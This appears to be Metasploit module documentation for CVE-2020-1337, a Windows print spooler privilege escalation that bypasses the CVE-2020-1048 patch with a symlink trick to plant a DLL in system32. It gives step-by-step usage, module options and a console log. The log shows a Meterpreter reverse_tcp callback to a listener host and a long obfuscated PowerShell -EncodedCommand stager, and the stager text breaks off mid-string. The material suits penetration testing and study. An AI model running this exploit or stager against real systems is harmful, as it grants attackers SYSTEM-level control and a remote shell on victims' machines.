## Vulnerable Application

Vulnerable versions for exploit
All unpatched windows through version 2003

### Introduction

CVE-2020-1337 is the same exploit as CVE-2020-1048 except that it
contains a bypass to the first Microsoft patch for CVE-2020-1048.
The first patch released by Microsoft for 1048 uses a check to
verify that the process creating a printer port targeting a location
has privileges to write to that location.
Unfortunately, the first patch Microsoft released only checks the
permissions when the port is created.  The bypass utilized here is
simply to creates the port pointing to a location the user can write
to, then after the printer port is created, it creates a symlink from
the location pointed to by the printer port to a second location.
The check will pass because the link is only created after the check,
but the link will be in place when the print takes place, so the file
write will pass through and end up in the trusted location.

When the printer is created, the target will show a pop-up saying a
printer was created.
A larger issue here is that the Spooler service does not like to stop.
Trying `sc stop` Spooler does not stop the spooler.
Killing the pid with a trusted process will kill it, but it restarts
automatically.
Using the `pendingFileRenameOperations` registry key also does not appear
to work.
To remove the dll, you can (as SYSTEM):
migrate into another process if you are loaded as ual.dll
`sc config spooler start= disabled`
`taskkill /F /IM spoolsv.exe`
`del ualapi.dll`
`sc config spooler start= auto`
`sc start spooler`

## Verification Steps

 Start ```msfconsole```
 get session on a windows target that is not patched (and <= windows 10 version 2004)
 ```use windows/local/cve_2020_1337_printerdemon```
 ```set session <session>```
 ```set payload <payload>```
 ```set lhost <lhost>```
 ```set lport <lport>```
 ```run```

Reboot twice
Verify you get a session

## Options

### DESTINATION_FILE
  The remote file you would like to write to.  Default is
  ```ualapi.dll```

### DESTINATION_PATH
  The remote location of the file you would like to write to.  Default is
  ```C:\windows\system32\```
  
### JUNCTION_PATH
  Path to use as a juntion point.  It should be nonexistent/empty.  Default is
  ```%TEMP%/%RAND%```

### PRINTER_NAME
  The printer name to use.  Default is %RAND%.

### RESTART_TARGET
  This will restart the target to force the overwrite.  YOU WILL LOSE
  YOUR SESSION unless you have a method of persistence.
  The dll will not be run until a second reboot.
  
### SESSION
  The session to target

## Scenarios

### Tested on Windows10 x64 Release 1903 with 1048 patch (https://www.catalog.update.microsoft.com/Search.aspx?q=kb4556799)

```
[*] Sending stage (200262 bytes) to 192.168.132.134
[*] Meterpreter session 3 opened (192.168.135.197:5555 -> 192.168.132.134:49675) at 2020-12-16 13:52:03 -0600

msf exploit(windows/local/cve_2020_1337_printerdemon) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-CL5L2IH\msfuser
meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 3...
msf exploit(windows/local/cve_2020_1337_printerdemon) > show options

Module options (exploit/windows/local/cve_2020_1337_printerdemon):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DESTINATION_FILE                   no        Filename to overwrite (ualapi.dll by default).
   DESTINATION_PATH                   no        Location of file to overwrite (%WINDIR%\system32\ by default).
   JUNCTION_PATH                      no        Path to use as junction (%TEMP%/%RAND% by default).
   PRINTER_NAME      ZVRhh            yes       Printer Name to use (%RAND% by default).
   RESTART_TARGET    false            no        Restart the target after exploit (you will lose your session until a second reboot).
   SESSION           1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.197  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/local/cve_2020_1337_printerdemon) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2020_1337_printerdemon) > set session 3
session => 3
msf exploit(windows/local/cve_2020_1337_printerdemon) > set disablepayloadhandler false
disablepayloadhandler => false
msf exploit(windows/local/cve_2020_1337_printerdemon) > set wfsdelay 600
wfsdelay => 600
msf exploit(windows/local/cve_2020_1337_printerdemon) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-CL5L2IH via session ID: 3
[*] Target Arch = x64
[*] Payload Arch = x64
[*] Replacing variables
[*] Running Exploit on DESKTOP-CL5L2IH

[-] Compressed size: 12608
[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit.
[+] Launching stager:
[+]  - Bytes remaining: 12608
[+] EXECUTING:
powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEASwBWAGwAMgBsADgAQwBBADYAVwBaAFQAMwBNAGEAVwA1AEwARgB2ADgAcgBzAFAAQgBQAFIAQwB5AHoASgBEAGsAZgB2AHMAawBSAFIAWQBBAFQAbwBBAGcAVwB2ADYATwBnAEYASQBLAEoAcwA4ADIAUwBlAEoAZABrAGwANgA5AFAAUAArAFoAMQBiAEwAMwByADIAbwB3ADIAQgBLAE8ANwBOAFAAeQBkAFAAbgBrAHoAKwBWAFgANwAvADkAZgBYAHAAOAB2ADMAeAA5AFAAMwBsADMALwAvADgANQArAHIAMAA4AG4ALwArAHMAZABrAC8AZgBkADAAZgAvAGoAegA5ADkANwB1AEIALwB0ADUALwBlAFYANAArAFQAaAA1AHYAaAArAC8AKwA4AGUANQB6AEcANQBjAFkAUABjAGUAeABLADcANwBGAGUAQgBMADcAVgBIAFEAeABUAHQARwAwAHgAWABOAFUAbgA2AEwAcABpAHEAYwBZAEQAVwBMAFIAeABzAGUAbwBaAG4ARgBzAGkAegArAGoASwB1AE0AaAA5AEgAcgBiAHgAagBTAEsAUgBWAFIAMQBQAEgAVAB4AEUAdQBVAG4AdgB2AGUARAA5AC8AcgBlAEkARwA0AGoANgBxADcANABFAE8ATgBaAGYAcgA0AGEAeABGADEAYgBmAE8AWQA1AHYAYQA2ADUANQArAC8AegBEAHEAbABZACsAWAB1AHAATwBQAE4ANgB4AEsANwB5AEoAbgBhAHAAdQBJADcAYgBRAGEAeQA3ADQAbQB0AFUARgA5ADUALwA0ADMAdQBUADQAUAB0AG4ANwBCADcAdwAvAEMASABGAHoAeQBqAFAAZQBvADcAWABXAFIAeQA2ADQAaQBYAEcAawBjAC8AWAAvAFgAcgB1AEwALwB3ADUAdABIAHgAKwBqAEYATwByADkAMgBQAGIATgA4AEIAdgBuAGYAcwBGACsANgBiAHgALwA3AGwAMwB3AEgATQB2ADMASwBOADcAUAA4AFQASQBmAHYALwB1AC8AWABvAGgAWABuAGQAUgBIAFAAagAvAEsAUgBWAHYAbgBPAGYAbgBiADIAOABpAGQAYwBXAHYAcQBHADcAaQB3AGYAWgBPACsATgA1AEQARABDACsASwBlADEASAB4ADMAdgA2AFUARQA4ADUANQA0ADcAeAA1AEcANABQAC8AbgBIACsAVwBYADgAVgAzAHoAdgAvAGMARgBaAE0AWQBKAHUAeABUAG4ATQB0AFkAZABjAFUAMgBxAGkANQBtADUASABQAFkAYwBrADgAUgB0ADgAOAB4AFMALwBoAFYAeABxAHcAcgA3AHYAbgArAEoAbwByAGIAcQBDAFkAeAA3AFkAcQBmAFAATAA5AEkAZQBqACsAdQBZADkATQBXAEsAWQBiAE8AegAxAE8ATQBTAC8AQQB4AHgAZQA1AGwAVgA4AHkASgAxAHkANgBVAHQAMQBFAGQAYQArAEsAaQArADIAVABuAEQAWABZACsASgBOAG0AagBPAEsALwBhAGUAQwBNAHUAeQBmAGEAVwBzAFMARQBQAG8AMABaADQANABmAHUAZAAvAEMAagBLAEcAQwBtACsAYgBmAEUAWQB0ADUAOQBpADcAdgBzAEgAdgBCAGIAYwBQADAAKwB5AHUAKwB6AEkAMQAxAGYAeQBxAFAAKwAvAGoAMgBHAE4AMwAvAGYAWQByADMAZwBVAHYATgBmADMAdgAvAEcAcQA1ADMANABUAFIALwBtADMAagBGAEgARQBNAG4AUwBlAC8AcgA5AEsAeABSADEAMgB5AEoANABQADMASwBkADQAMwBmAEcAYwAvAEYAMQBqAC8ANwBhAFYASAB5AFgAKwBoAGMAOAAvADQAVQAvADEASABMAFcAZgBkADMAeQB2AGUAbgBzAGEAOABMAFYAdgBpADAAdQBNAG0AeAB5AC8AOABwAG4AMwB5AHQAdQBSAE8AcgBoAHgAZgBGAHIAZABXACsAcgB6AEsAUAA2AEkAcQBnAFgAUABIADcAaABQADUAMgB5AGoAVABOAFQASABsAHgAaABPAE8ARwA5AFAAUAB2AGEAdAA3AHQAVQA5AEMALwBJAHkAZABQADAASgBiAHgAZgBzAHUAOABlAFAAVgBjAFIAMQBqAEkANwBrAHMAegBFAGUAcwBGAFAAMwByAHkATQA2ADcARABwADAAOABVAHEAYwA1AFAAZQBDAGUANABTAHIAUAAvAEYAWAArAEwANABDAG4ALwB0AE8ALwBsAEgAWABTAGYARQBHAEwAKwBDAGoATQBxADQAdQA0AEsASgBwADQANABwADcAZAAxADMAOAA0AHYAMAAyAGMAbAB3AFUAMQB3AEkANwBhAHUAZAAvAHcAdgArAGYAKwBGAHoANABmAHUASgA1ADIAVgBkAFQARAAvAEwAegAxAFQAaABLAHEAZwB2AGwAUABkAGQASABJAGoANwBUAEcARABiAEMAQwBUAGoAbwB3AFAAMAB2AC8ATgBRADUAUQAvAEEAawBQAEQAeAB5AGoANwA0AC8AagA5AEcARQB6ADMALwB6AG0AbABLAHgAaQArAHEAWQArAFUAaQA0AE8AQgBFAGYANABWAEIAMgB6AEkAbQAzADgARgBiAEEAUgAvAHMATwAvADAAdgB3ADEASABDAHYANwBsAHYAdwAzAEoAcgA4AGkAMgBkADIAOABKAHIAdwBwAFAAZwBhAGwAMgB2AHkAWABqAGIANQBPAGUARgBSAGUAYQBnADQAUgAvAGYAcgA4ADEAWgA0AEQAOQBmAHQAagBIAHYAMABlAFIAMwB4AG0AMwB3AEoAVgAvAGYARQBVADcAaQBZAGsAcgBlAEUAWABjAE0AWgArAFAAOABDAEgAbgBiADQAVwBiAHEAdQBqAEEAZgBWAHoAUwAvAGkAdgBnAHIAaABGAGIANwByAFYARQA4AGoAegBvAGMAZgBXAG4AQwBmAGkATQBNAHgAZABMAC8AdQBrADEAOAAvADgARgBQADUAZQBpAE4AdQB4ADEAUgBzAHcATwBFACsAaQBGAGUATgB2AGEANgB6AGcAKwB2AGkARwBNAHUAawA3ADgAdABlADIAUwBNAC8AbABaAC8AUQB1AFUAUAB4AEcAWABXAGsAMQAwAE8AUQAzAHcARgA0ACsAcwAzADUAdwB2AFUATgB6AHkAMABDAGYATgBiAFkAOAB5AGQAKwBDAHoAZQAvAGUALwBzADcAOABpAGsAYwAzAHgAcgBQAFMAZgBGAFEAWAB1AFcAZgBlAFYASQA0AC8AWQB2ADYATwArAEIASAByAHUAOABuADgAdQBTADQAcQB3ADYAWAB4AEUARQA0ADIAYwBCAEgAaQB2ADkARAB6ADUAZABIADgAQwBiAGMAaQBrAGQAZgBNADQANgBVAFIALwBIAHAAUQA2AHUAOABLAFEALwBDAHkAWQBaADQAYgBzAEMARAA3AGwAMABRADEANgBxAGgAVABtADcAaABDAGUAVQA1AGMAZgA4AEsAWABBAC8AUAB4AEcASABpAGYATQBGAHIASQAvAE4AUQAzAGYAdgA3AEUAOQA3AGUAdwBPAE8ASwB5AHgAYgArAGsAaAAzAHoARQBLADUATAAyADcAZgBtAHYAZwBUAE8AaABaAE0AYQBPADIAVwBQAGUATwAwADkAZgBLAHIAegB2AGwATQBQAFIALwBoAEsAOQB5AHUAUAA2AGwAdgBDAE8AZgBYAGwAdgBsAEcATQBqAEwAZQBnAFAAbABVAC8AbwBUAHIAUgB1AGIAcwBVAFQALwBhAGYAdgBBAHEASAB1AHYAYwBSAGUAOABYAGoASAA2AG4ARABCAGYAVwBnAGUAQgAvAGQAMQB3AGIAaQBZAGYARwBnAGMAQwBTAGUAKwBFAEIAZABMAHkASQAvAHQAMwBVAC8AbQBBAG0AZgAxAEwAWABqAG4AZgBrAEQAUABoAE0ALwAxAEoAMwB1AFUAUgAwADEAbgBiADQALwBOAGgANgBYADQARQBsADIANwA3AEIAbgBEAHcALwBxAHYAQQBkAHcAbwB1AGYAbQBuAEsAdgA4ACsATAA1AHMAWAA4AG4ANwB4AHYAbQA3AEEAUQBmAHUAOAA4AEoAYgBDAGMAKwBwAHoAaABkADkAbgBRADIASQBxADMAaABsAHcAUAAzADcAQwBPAGQAdAA1AGYAcAAxAC8AMwBGADgAagA5AFEAeAAvADMAZAAvAFMAcgBLAGYANQA0ADcAdwB3AGgAZgBpAE4AVABOAC8AaQBhACsAVABlAEcAdAA0AEIARgA5AFgAcgBsAC8AdwBtAHUATgB5AEIAWgAvAG8ASABPAFcAOQBWAGwANAB5AC8AaABTAFAAQwBYAEYAZABrADMALwBGAGMAdwBYAGYAZwB2AGQAUQBQAHAAVABuAFIARAA5AFEASABUAHkAQQBCAHoAMgAzAG8AYgA1ADAANwBnADQAYwB5AEgALwBoAGUAawBiAGQAcgBsADEAbgBYAGMAWgAxAFYAZQBmADYAVgByAHcATwAyAEsAdgA3AGEAdgBjAFYAeAArAE8AbgBjAFIAUwA2AFIAKwBjAGMAdwBRAE8ANgBBAFQANABxAHoAYgA5AGYAdwBZAHYAcQA5AFUAeQA5AHkALwA0AHgAZABUAHUARgBiADgAVwAvAE4AZgBiAFQAeAArAEIAVAAyAGIAOQB0ADgAZgBlAGMAYwBhAHgAegBsAGsAbAB4AEYAbAA5AE8AbgBaAGMAUwBYAEQAMwB5AHEAbgA0AHoANABYAHoAVgBWADgAMwBuAHUAWgA0ADcAZQBQAHEASwB1AGwAdQBpAGsAeQByAHIAbwB4AEwAYwBMAEkAbAAvADUAYgB3ADkAVwBWACsAawBIAEkAOABhAGUAMQBXAC8AUgArAEsAcAAvAEMANgBKAHUALwBBADEAeABXAC8AbABlAGQAYgA3AGsAZQBCADUAKwBwAEoANQB4AFgAMQB6AFoAaAA3AGwAWAB1AEYAbABRAHgALwBVADgAKwBaAGYANQBVAFYAMQBOAGMAWQBQAHgAWABkAEEAdgBQAFQALwBDAHoAagBhAHUAZgArADAAOABNAEMAcgArAFMAeQB3AHIAKwA4AGYAaQB1AE8AQgArAEkALwB0ADMAMgBPAHYAcgA5ADcAYwAxAC8AeABjAHcALwBOAG4AOAB3AGYAOQBWAHYAYwBzAHIAQwBjAHUANABMAFUAaQBuAG4AdgA2ADMATgBEAFAAUABXAFAAMwAwAGUAOQBiAC8ATgBqAHgALwBKAHIAegB5AFYALwBrAC8AcABoAHMAVAA5AEEAdgAzACsAQwA1AEkALwBnAFcAagBtAGYAZwBRAGYAYgB1ADgAVgA5ADkAWgBHAFAAZQBhAGYAbgBlAFgALwBpAHAATwBqAG0ARAB6ADIAbQBYACsAUwBtAFIATgA5AFcAQgAvAFAANgBEAHUAQwB1AGYASAA0AG0AagArAEgAQgBzAFgAWgBhAG8AcAB4AGsANAB1AGMAUAB2AGwAWABFADEAQQA1ACsAdgA1AEsATwBHAFQAMABmAG0AdQB4AFgAOQBZAGsATQBjADkAZgA4AGwATwBsAEoANQAzAGYARwA5ADAAbgAzAHkAaQArAHUAYgB2AHEASwA0AE4ATwBnADIANQBXAFUARgBqADUAZwBIAHMAYgBPAGoAcgBsAGIAdwBuADMAagB0AGoAWABOAE8AeABCAE0AYwA0ADQAZgBzAG0ATQBNAC8ANABxAHUAWgB6ADcAMABCAFoAegBlAHUANwAxAFoAKwBVAHoALwAwAEMAYwBYAHAAeQBLAHYAcQBaAGUAbAArADAANABLAHYAZQArAEsAdwBJAFYAOQA2AHoAYgByAEkAZQB1AEEATwBIAE4AMQBaAEoAMwBmAFUANAA4AFcANAA3AG4AWABFAG8AYwBmAEQAcQBjADMANgBVAGQAOABiADkAVAByAG8AdgBzAGYAeABmAFkANAB6AFAATgByAFEANQAwAGIAVwAvAGUAZwA4ADQAWABtAGQAeABIAGYAWgBuAG4ARwB1AE0AOABWAGIAZABiADMASABQADgAVgAvAEEAOAArAFUANgBEAEwAaABmAEUAeAA4ADkAVABrADYAdgBlAGQAUAAxAGUAMABBAFgASQBqAFAAbgBuAGkAdgB2AHYAOQBHAFgAegAyAGkANAAwAHYAcgA5AE0AKwA1AFAAOABIAHYASABlAGMAMgA0AE0AUAAzAG8AWQBmAGcATQArAFYAMQA0ADMAbwAyAFQAcwAvAG8ARgBjAFgAbABtAHYAZwBZAFoAeQBOADQAdAA5AGQAVAAzAEMATgAvAEQAdAB3AHoAZABEADkAYQBaAGYAdgBrAGoALwBDADEAQgB6AGYAeQBRAC8AbQB0ADcAVQA4AG4ASABhAGYAUAB0ADkAWgBYAGQAZABiAEoAUQArAFkASwAyAFMATQAvAHQANQA1AHoAbgBxAGsAZgAyAHkAdgBjAFAAbABNAG4ATwArAHYARQBFAHIANwA1ADIATQA5AEIAMwA4AGwASAAwACsAdgBNAEIALwBTAGgAMwBqAC8AQQBmADUAWAAxAFUAbQBsAGMAbwBUAE8ARgB0AHcAUQBQAEsAQQA1ADcANwBOAEoAegBPADUANQBYAHYAYQB6AEIAcABYAFIAdQB3AGgALwA1AHIANwB5AFoAeAB6AGYATQBjACsASwBUAE4AZgBnAEIAWAA5AFQAMQAyAFAAcABoAGcAegAwAEgANgAvADQAVwBIAGYARwB0AHgAOQBIAGUAOABZAEEAdgBzAHYANgArAHcAcQA2ADUANQB6AHYAMwBqAFYAdgBlAHIALwBCAGIAKwBFAGgAOABYAC8AdwByAC8ATgB6AFEANQArAGYAbQBsAFUALwB3ADEAeABQADIAUAB0AEMAMwAxAEEAOABTAGMANAAvAHUAWAA5AEcAZgBkAGYAKwBlAGYAcQBpADYATwBOAG4AZgBaADMAUwBUAHoAOQArADYAYgBnAGUAeQBHADMAMQBxADMAbgBsAEUARgB4ADMAdwBBADkAMQBKAHYAOAB4ADUAMwBPAEMAdgArADYAcAA0AGUAZwBtACsAeAA4AGIAYgBtAFQAegBNAC8ASAAzADMAOQB5AGYAagB6AHYAMgByAEkAZQA0AEYAZAB0AFcATwBUADIAUwBjAHEATAA0AFMAYwBSAG4AeAB2AFAAaQBBAC8AawBYAGQARABuADEAUAB3AC8AMwB5ADYANABmAG4AdwBsADUAdgB6AGUARQBaAGUARABQAEEAdgAvAFgAMwBDAEwALwBrAHoANABSADQASgBzAGQAOQBSAGwAMQB2ADgAVQBQADEALwBvAGIAZABVADMAaABqAGIARAA1ADIALwA5AHUAUgBkADkAWABwAEQAbgA2AHIAUABFAGYAcwB3AEUAMwBUAFoAZAA1AEoAOQBIAC8AaABhADQAawArAGsAUAA4AGIAMQB3AFgAegBCAFAAcQB1AGcAYgA5AHUAcgBJAE8ANQBaACsAeQA1AGIATwBNACsAUQB0ADUARwAxAHYAOQAzAG4AdAB2AGMAZgB6AHcALwAvAHUAUwA1AEcAZgAwAC8AMwAvAE8ARAA5AHcALwBjAE4ANgBaAHYANgBWAHoAWABEADMAUABaAE0AZABzAGwAdgBxAGwAVAB6ADAALwBXADcAeABkADQAeAB6AHgANgA5AFAAdwBDAFQAOABwAE8AZQBKAHYAKwBLAEoANQBMAHQAcwBzADgAZQBRAGEAbgAyAHoAYgAzADgAUgBYACsAeQBLADgAdAA4ADEAVwBlAFUAMgB2ADQAYwBFAE4AOAA0AEIAdgBqAG8AUwBYAC8ANwA0ADAATABlAEYAMwAxAHUAeQBkAHUAegBIAFUAZABQAE4AdgBSAEwAMwA3AFMAVgA0ADYAYwBOAHkAUwB2ADgATgB1AFoAegArAGYAawAvAGUAUQA1ADIAWABOAEIAUgA3ADQAZQBxAEIAZgB5AEUATAAzAGQAbgBuAE0AbgB1AGUAKwBvAHYAdgBSAHEAWABHADUAZAB4ADgANwBQAHAAdAArAEwAZgBNAHgAMgBFADgAYwBaADkAZwA2AHgAWQA0AGIAKwBFAGUALwB0ADYAUgAvAEMAMQBaAHgAKwBRAHAAegBjADcAMwB5AE8AOAA3ADUAawBMAHkAQgA3AEgANgBMAFgAbQBlAHgARgA2AE0ATgBkAG4AdgB0ADIAZgBWADEAdQA0AFQAMwBGAFoAUQBFAHYAeQBvADgAdAA4ADQASABzAG0AVgBuAFAATQA5AGQAVABUADAAZgBtAEsATQA4ADMAbQBlAGMAbQBHAFkALwB3AHMAZQBOADAAZwB3ADUAYQBtAEUAKwA2AG4AdQArAFoAMgA0AFEAVAA5ADUAMgBoADgAWABOAEQAbgBhADIAagB4ADYARwAvADEALwBWADQASwBvAG4AYgBoAG4AbwA1AG0AYgArAHAAWQAvAEoAKwBSAGcAOQBWADEATQBlADIAegBYAFAATgAwAG4AMwBlAGQAdgA4AEcAUAAxAHYAcgBrAFEAdAB4AFcALwBMAHEAUABrAFEALwBRAFQALwByAHYAQgBYADkAWABIAEgAZQBvADgAdQBFAHIANwBWAHgAeABsAHcATABQADcAYwA4AHQAKwBaAFYAOQB1ADYAZABuAHkANwBQAEkAOQBJAFIAcgB2ADkAMQBtAC8AZABFAGMAKwBZAEEANgAzADcANgBhAGUAQgBIAGgALwAvAEwAeQBIAFAAawBqAGoAbAB5AHgASABPAGMAYgA3ADMAeQAwAFgAbAAxAFgAWQBNAEQALwBEAFIATwBGAHIAeABmAEUAcwArAGgAOABYAEEAQgA3ADEAdgA0AHYAYgBSAC8AagA1ADQAWAB6AEEATgB0ADUAaAAvADgAVAA3AG0ALwA1AEwAaQA2AG4ALwAyADkAMwA3AEMAdQA5ADkAeQBlADUANQBZAHIANgBrAEwAZgBHADIASAB2AEYAbgA2AGgAVAA3AFYANQBuAHQAOAB3AHYANgBIAGYANABZAHYASwArAE0ANwA5AEUAMQB4ADUAZgBwAFoAZABlAFoALwB4AGwAVAB5AGsAZgBsADkAdwA4AGgAegBTAGcATABPAGQAOQAwAHkAZQBMADkAQgB4ADYASQBNAEIAUABIAGgATgBIAG0AdgB5AHgAdAA3AEUAZgBiAGUAaAByAHEANgB0AEgANQBtAHYAUwB0AHYAWAA5AFgAcwBVADgAOAB3AE8AMwBtAEcAZgBBAFoAKwBWAHIAcAA5AEoAMQBuAFcASwBzAC8ASwBVADMATwArAFkAWgA1AGoAegB6ACsAUgB0ADQAegB5AGkANwB6AFAAdgBYAGUAUABYAEQAQgA2AFgASABkAGEAVgBzAG4ATgBIAHYAeQAxAGQAMQA1AC8ANwBmAHYAcQBUAHUASwB6AHAAMQA4AHgASAArAEsAZgA3AGoAOABiAHIASgBjACsAUABKAGIAZwBFAGYAegBQAHkAOABMADYAZgBPADAAZQB1AGUAOAAvAGQAMwBrAC8AcwBPAFcAZQBMAGYANAA0AHIAYwArADAAbAA5ADEALwBaAHUANAA1ACsASAB1AFYAKwA4AGIAegA2ACsANgB2ADMAZAA4AHoAWAA4AHIATgB4AEgALwBWADgAOABKAFgAegByAFYAdgBSAHoAOQBaAFYATQAvAGoAQwBkAFgARgBpAG4AMQBPAGEAOQA3ADYAQQA2ADcAMwBuAFIAOQBmAHQAZABhACsAYgBIAC8AdgA5ADMAcAA3AFAAMQA0ADUARAB5AHIAcQBtAFkAbgAvAEIAMwBGAHUAVABSACsALwBEAFAATgBlAHcAcgAyAEwALwBSADkAKwBCAFYAKwBqAGYANgBMAFEAeABPAGgAYwA3AEIANQBrAEgASABBAGYAcwBLAC8ALwBEAFUAOQBTAEgAZQBQAG8AQgBQADQAWABiAEIAZgBPAEoANAB0AFMAZwBOAHoAegAvAGsAYgArAFcAKwBuAGoAcQA5AGMAWQAzACsARQBaAHgAcgBhAHoAUABxAGIAOAA4AGgANgAxADgATAAzAHkAbQArAHcANgBlAGEAeQBmAHMAdgB6AHIAdgBVACsASABCAHkAbgAzADUAbQArAGQANwBjAEQAVgB5ADMATQAwADMAeQBmAHUAVwB4AFAAbAAvAFUASwA4AEgANgBzAGEANgBOAGMAKwA1AG4AcgBQAEUATQAzAGYAMgA2ADUASgAxAFIAKwBsACsAZAA4AC8ANQBhACsAdABzADgAOQBuAGMAKwBlAG0AeQAzAFgAUABxAFQAUABpADMAbgBoAEUATwA5ADUASAAzAGQASABQAHcAeAB2ADYAawB6AGIAegBpAFAAZABUAEkAZgBvACsAcwBHAHkAUAB2AE8AOQBiAFUAdQAvAFQAYQB5AG4AWQAyAFcAUwBmAGsATwBXADcAaABlADkAbAA3ADUAagA1AGYAawBsAC8AcAA0AGwAOQA5AGYANwBuAG0AMwBEADMANwBoAGoASABmAEMAOAA4AFgAdABYAG0ASABQAHAAUABuAGoAcABYADMAQQA1ADYALwBIAEkAZQBaADkANABiAHUAWQA4AHUATQBSACsANwB4AFgAdgB5AEMAdgBkAEwASAA2AHoAeAAzAGgAdgBlAC8ASwArAGYASgBlAFgAawAxAC8AbAB3AC8ANwBHAGYAbwBBAHcAbQBlADkAYQB2ADkAVgByACsAdwBEAHAAUwBkAFcAKwBOAHAAUQBMAHgAcQBlAE8AMABCADMAdgBGAGUASQB1ACsAeAA1AGoAMABlAGsAdQAwADYAZwA3AE8AYgBuAGsAZAAyADMAbwBQAGgAdAAzAEIAZgB1AHoAKwBlADIAWQB0AGUAbQA1AC8AZwB5ADcASAB4AE4AdwBlAHYASgArAEsAaAB2AG0AaQA5AHEAMwBxADQAQQA5AC8AdwBIAEgAeABMAG4AegBEAFAAMQBOAFQAaAB4AG4ATQBjACsALwA5AGgAbgBmAGMAaABmACsAKwBYAHgANQBNAGMAQgA5AFgAegBqAEQAaQBqAHYAOQBBAGYAaQB0AC8AZQB1AG8AaQA5AEoAZgBGAHcAbgAzAHoAaQB1AFQAWAB6AE8AZgBzAHAAKwBMAEgAeQB2AE8ARQA5ADUAYwB4AHgAYwB0ADYAMgA0AEcAWABHADMAbQBUAFkANQByAGsAZABuAEgAawB1ADkAcAB3AHkANwBmAGYAYQBjADgANQBkAHMANwBjAEQAQgA0ADYAcgBmACsAZgBJAE8AdABIADEAMAB1ACsAagBGAEcAZgBGAGMAOQBiAHYANgA1ADkAOABuAHYAbgB0AFUAOQBaAHoAdwBzAC8ASwBlAG4AUwBDAG4AOQAvAEkAUgAwAE4AZgBaADcALwBVAFoAUgAyADUAcAAvAC8AdwBPAHcAcgBuAHkAYQA5AEQAeQBuAFAAcABQAFAASwA4AG0AWgBoAFQAeABaAHQAegB6AC8AcwB6ADYAdgByAEsAZQB4AGoAMgBYADEAbgBYAGYAZQBEAHoAcABlAGYAMQBBAEMALwBmAHEASgB1AEQANQA4ADQAegB1AHYAMwBOAGUAdwBmAHoAZwBmAFYAVgBnADMAMgBwAHoAWAAxAHQAdwA1ADYAaABZAGgANQBrAEwAawBVAC8AQwAyAC8AcwB4ADcAdwAvAG0AMQBDAHYARABaAC8AWAA5AEIAWAB4AGcATwA0AGQANQBiAGcAUQA3AHcAbgA0AE4AegA5ADcAbgAxAFMAMQBQAFoAKwBpAFEANgBoAFQANwAxAFAAbQA1AGkAbgBQAG8AMgBXAGUAdAA4AGYAcwBlAGQAbQBIAHAATgB5AC8AcwB4ADgAdgAzAGoATgA1AGoAMgBXADkATgBDAFgAZQBSADMAUgBMAE4AYwB2ADkAVAB6AGkAWQBNAHUAZQBOAG4AUwAvAFAAaABZADYATABmADcAOABnAGYAcwA5ADUAYgA0AG4AZQA5AHAAegAzAFQATAAxAGMAZQBSADkAbQBIAG4AQgBmAE0AaAA2AFMANQArAEwASQBPAGsANgBmAFQALwB0ADkAZQBBAFAAUABvAHoAdgBSAGgAeQBPAGYALwA5AHIAcgBnAHcAMwA1AHUAVwBNACsAWQBaADgATwBIAG8AVwBMAHUAZgBIAGgAYwA4AHoAVABVADgAOABUADMAagArADkATwBpAC8AZQBIAHoANwAzAHYAOABOAFkAagAzAG8AdgBjAFcAZAA3AG4AVQBmAHIANABTADEAMQA2AHoAbQBWAE8AUwA2AFIALwArAFMANgBiADcATgBPADIAbwBQAHYAbwBmAEcAVAA1ADAAYgB6ADcAQwBmACsALwAyAGkAOQBhAHIAMQA1AHoAbgBQAFEAMABQAEgATQBlAEMASQBQADQAegBMAHYAVQBjAGIAZQAxAHgAWQA4AGYANwBDACsAYgBMAEIANwBBAFUANgAzADMAcwBNAEcALwBQAG4AaQBPAFkAcgA0ADUAagAzAEUAKwA3AHkASABwAHEAKwAwAHoARQB2AFcAZwB6AHYAUABFADcATwA4ADUAOABxAC8ARAAxAHgAbABQAFUAMgBmAE8AbwBQADcAZwBmAFcAZABlAGYAbwBUAC8AUABDAGgAMQA0AHMAVgA1ADgANwBKAGQANQA2AEwAbAB2ADMAdgBJAHYANgBkAFoAVwBNADkAMwA4AEMAYgBIADYAMwBqAHIASQBlADkAZAAzAG4AZgA2ADgAbAA3AHoAcAAxADYAUAAyAHkAOQBkADgANQB6AFIANQA0AGIARgBNADgAOQBmAHUAVQA5AEgASABOADYAMQBoAE4AegA0ADkAegB6AGkAMwArAFgAUw